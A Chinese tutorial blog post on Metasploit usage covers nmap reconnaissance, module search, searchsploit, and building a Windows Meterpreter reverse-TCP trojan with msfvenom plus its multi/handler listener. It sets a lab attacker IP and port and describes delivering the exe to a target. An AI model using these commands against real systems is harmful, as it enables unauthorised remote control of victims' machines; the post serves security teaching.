msf的用法,msfvenom生成shell

1. msf使用:

使用前的准备:

  1. 连接msf的数据库,启动msf数据库systemctl start postgresql

  2. 先用nmap扫描:

    1. nmap -sn 192.168.137.0/24,看看哪些主机存活。

    2. nmap --min-rate 10000 -p- 192.168.137.128 ,用最慢10000的速度扫描ip端口。

    3. nmap --script=vuln -p 刚刚扫出来开放的端口号 192.168.112.158去扫描一下开放的端口号存在哪些可以利用的漏洞编号。

    4. 这一步也可以在msf里使用msf的nmap。如:db_nmap -sn 192.168.137.0/24,都是一样的

启动msf:

  1. msfconsole启动msf

  2. 找到漏洞编号之后,search 漏洞编号,找到suxiliary开头的辅助模块,先探测一下这个漏洞是否可能利用,比如是第4个,那么就use 4,也可以use 具体文件的位置exploit开头的则是exp漏洞利用模块,先探测如果可行,再使用exp模块,使用方法一样。这个是在库里搜索漏洞编号,如果没有可以利用的exp,可以直接在kali命令行searchsploit 漏洞编号看看在线库是否有可利用的exp。

  3. 进入到模块之后,show options看一下当前模块的选项。

  4. 必选的选项但是没值的话,要set上,比如:set rhosts 192.168.137.131rhosts表示目标主机。

  5. 都设置好之后可以run.

在这里插入图片描述

利用searchsploit找漏洞并利用:
  1. 如果msf自带的库里search不到,那么利用之前信息搜集收集到的web容器版本,数据库版本,操作系统版本等,用searchsploit 搜索漏洞,如:searchsploit dirty 搜索dirty的cms漏洞。

    在这里插入图片描述

  2. 得到代码名之后,searchsploit -p 40847 显示文件位置。

    在这里插入图片描述

  3. 然后具体的编译命令和用法在文件里都有说明,直接在文件里找。如:

    在这里插入图片描述

msfvenom生成木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.148 LPORT=4444 -f exe -o shell.exe 用msfvenom模块生成一个基于tcp的反弹shell木马为shell.exe,攻击机为:192.168.112.148,监听端口为:4444 ,-f是生成的木马类型,这里是.exe文件,-o是指定名字,也可以用>代替,如:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.148 LPORT=4444 -f exe > shell.exe

​ 此时生成的是一个.exe文件,我们需要将这个.exe文件交给目标,让目标把.exe文件放在目标主机上我们才能运行,或者我们可以上传到目标主机。

接受:
  1. 在msf中打开MSF的监听:use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp 指定payload,这个payload就是刚刚上面使用的payload
  3. show options
  4. set lhost 192.168.112.148 指定攻击机的地址
  5. set lport 4444 指定攻击机打开的监听端口
  6. run
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值